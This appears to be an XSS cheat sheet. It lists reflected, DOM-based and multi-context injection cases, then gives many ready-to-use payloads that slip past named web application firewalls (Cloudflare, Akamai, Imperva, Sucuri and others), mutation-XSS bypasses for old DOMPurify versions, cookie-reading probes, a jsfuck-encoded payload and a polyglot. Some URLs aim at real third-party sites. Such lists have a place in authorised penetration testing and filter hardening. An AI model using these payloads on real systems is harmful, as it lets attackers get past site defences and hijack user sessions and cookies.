🔹Single Reflection Using QUERY of URL🔹
01 - HTML Injection (a)
02 - HTML Injection Inline with Double Quotes (b1)
03 - HTML Injection Inline with Single Quotes (b2)
04 - HTML Injection Inline with Double Quotes: No Tag Breaking (b3)
05 - HTML Injection Inline with Single Quotes: No Tag Breaking (b4)
06 - HTML Injection with Single Quotes in JS Block (c1)
07 - HTML Injection with Double Quotes in JS Block (c2)
08 - JS Injection with Single Quotes (c3)
09 - JS Injection with Double Quotes (c4)
10 - Escaped JS Injection with Single Quotes (c5)
11 - Escaped JS Injection with Double Quotes (c6)
12 - JS Injection in Event Handler (No Handler Breaking)
13 - JS Injection in Fully Validated Anchor (Href)
14 - XML Injection with CDATA and Comment Breakout (p, q & r)
🔹Single Reflection Using PATH of URL ("friendly URLs")🔹
01 - HTML Injection Inline PHP_SELF
02 - HTML Injection 1 Level Deep
03 - HTML Injection 2 Levels Deep
04 - HTML Injection 3 Levels Deep
05 - HTML Injection in Script Block 1 Level Deep
06 - HTML Injection in Script Block 2 Levels Deep
07 - HTML Injection in Script Block 3 Levels Deep
08 - JS Injection in Script Block 1 Level Deep
09 - JS Injection in Script Block 2 Levels Deep
10 - JS Injection in Script Block 3 Levels Deep
🔹Multi Reflection🔹
01 - Double Injection in HTML Context with Double Quotes
02 - Double Injection in Mixed Context (HTML + JS) with Default Quotes
03 - Quoteless Inline Double Injection in JS variables
04 - Quoteless Inline Double Injection in JS object
05 - Quoteless Inline Double Injection in JS object with Nested Array
06 - Quoteless Inline Double Injection in JS object with Nested Function
🔹Special Cases🔹
01 - HTML Injection with Double Encoded Bypass
02 - HTML Injection with SQLi Error-Based *
03 - HTML Injection with PHP FILTER_VALIDATE_EMAIL Bypass
04 - HTML Injection with Strict-Length Input (32, 40 and 64 chars)
05 - HTML Injection with Strip-based Bypass (AFB)
06 - HTML Injection with Spell Checking Bypass
07 - HTML Injection with Base64 Encoded Input
08 - HTML Injection with Parameter Guessing
09 - HTML Injection in Parameter Name
10 - JS Injection with Single Quotes Fixing ReferenceError (also with Double Quotes and Escaped variations)
11 - Multi Context Injection with Bypass on Alpha-based Filter and JSON Encode Function (2 Different Entry Points)
12 - HTML Injection with CRLF in HTTP Header (Content-Type Replacement)
🔹DOM XSS🔹
01 - DOM Injection via URL parameter (by server + client)
02 - DOM Injection via URL Parameter (Document Sink)
03 - DOM Injection via Open Redirection (Location Sink)
04 - DOM Injection via URL Parameter (Execution Sink)
05 - DOM Injection via AJAX in URL Fragment (Document Sink)
06 - DOM Injection via AngularJS Library versions 1.6.0+
07 - DOM Injection via Bootstrap Library versions 4.0.0, 4.1.0 and 4.1.1
🔹ALWAYS ALERT🔹
Check that your XSS triggers on a critical in-scope domain, not in a sandboxed iframe or a sandbox domain.
alert(document.domain)
alert(window.origin)
window.alert(1)
window.document.cookie.alert(1)
window.localStorage(1)
Try it on:
URL query, fragment & path;
//ALERT: COOKIE
with(document)alert(cookie)
//ALERT: document.domain
prompt`${document.domain}`
🔹XSS Without parentheses ()🔹
This repo contains XSS payloads that don't require parentheses.
🔹BYPASS: WAF🔹
//AWS
<script>eval(atob(decodeURIComponent(confirm`1`)))</script>
//Akamai => tough but flawed
https://www.akamai.com/pt?x55=%22AutoFocus/%3E/OnFocus=top?.[%22ale%22%2B%22rt%22](1)/%22
https://brutelogic.com.br/gym.php?p08=%22AutoFocus/%3E/OnFocus=top?.[%22ale%22%2B%22rt%22](1)/%22
"AutoFocus/>/OnFocus=top?.["ale"+"rt"](1)/"
//CloudFlare => child's play
#.hta%253ciframe/srcdoc=<script/src="'-alert(document.domain)-'"></script>
#../index.php/%2522%253E%253Ciframe/srcdoc=<script/src="'-alert(document.domain)-'"></script>/
'>-setTimeout`\u0028alert(document.domain)\u0029`-'
'-setTimeout`prompt\u0028document.domain\u0029`-'
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
GET /search.html?ey272ayolocation.search=&q="><BODyonbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
"><BODyonbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg/onload={alert`1`}>
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
"><onx=[] onmouseover=prompt(1)>
%2sscript%2ualert()%2s/script%2u
"Onx=() onMouSeoVer=prompt(1)>
"Onx=[] onMouSeoVer=prompt(1)>
"/*/Onx=""//onfocus=prompt(1)>
"//Onx=""/*/%01onfocus=prompt(1)>
"%01onClick=prompt(1)>
"%2501onclick=prompt(1)>
"onClick="(prompt)(1)
"Onclick="(prompt(1))
"OnCliCk="(prompt`1`)
"Onclick="([1].map(confirm))
[1].map(confirm)
'ale'+'rt'()
a	l	e	r	t(1)
prompt(1)
prompt%26%2300000000000000000040;1%26%2300000000000000000041;
(prompt())
(prompt``)
<svg onload=alert%26%230000000040"1")>
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
<img ignored=() src=x onerror=prompt(1)>
<svg onx=() onload=(confirm)(1)>
<--`<img/src=` onerror=confirm``> --!>
<img src=x onerror="a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]](document.domain)">
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
'"><img/src/onerror=.1|alert``>
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
//DOMPurify
delete DOMPurify.isSupported
delete document.implementation.__proto__.createHTMLDocument
//DOMPurify < 2.1
<math><mtext><table><mglyph><style><!--</style><img title="--></mglyph><img	src=1	onerror=alert(1)>">
<math><mtext><table><mglyph><style><![CDATA[</style><img title="]]></mglyph><img	src=1	onerror=alert(1)>">
<math><mtext><table><mglyph><style><!--</style><img title="--></mglyph><img src=1 onerror=alert(1)>">
//DOMPurify < 2.0.1
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
<svg><p><style><a id="</style><img src=1 onerror=alert(1)>"></p></svg>
//Cloudfront
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>
"><--<img+src= "><svg/onload+alert(document.domain)>> --!>
//Cloudbric
<a69/onclick=[1].findIndex(alert)>pew
//Comodo WAF
<input/oninput='new Function`confir\u006d\`0\``'>
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
//ModSecurity
<a href="jav%0Dascript:alert(1)">
//Imperva => always naive
<input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(documen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>
<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
<a69/onclick=write()>pew
<details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open>
<svg onload\r\n=$.globalEval("al"+"ert()");>
<svg/onload=self[`aler`%2b`t`]`1`>
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
//Sucuri => narrow ways
BYPASS: 302
ws://google.com"><svg/onload=alert(2)>
wss://google.com"><svg/onload=alert(2)>
resource://google.com"><svg/onload=alert(2)>
BYPASS: 403 (Forbidden)
Reflected XSS on ???? via ?? parameter: 404 Not Found hides something.
Brute-force with FFUF to find a 200 OK endpoint.
Do parameter fuzzing with Arjun.
That parameter is vulnerable to XSS.
BYPASS: 429 (Too Many Requests)
BYPASS: Captcha (Google reCAPTCHA)
BYPASS: Two-Factor Authentication
🔹ENCODE PAYLOAD🔹
TRANSLATE JAVASCRIPT TO OTHER WRITING SYSTEMS.
//Encode: jsfuck
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
//Encode: aurebesh
https://aem1k.com/aurebesh.js/#
//Encode: Katakana
https://www.sljfaq.org/cgi/e2k.cgi
//Encode: Lontara
https://lingojam.com/Lontara
//Encode: Cuneiform
https://funtranslations.com/babylonian
Polyglot XSS
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e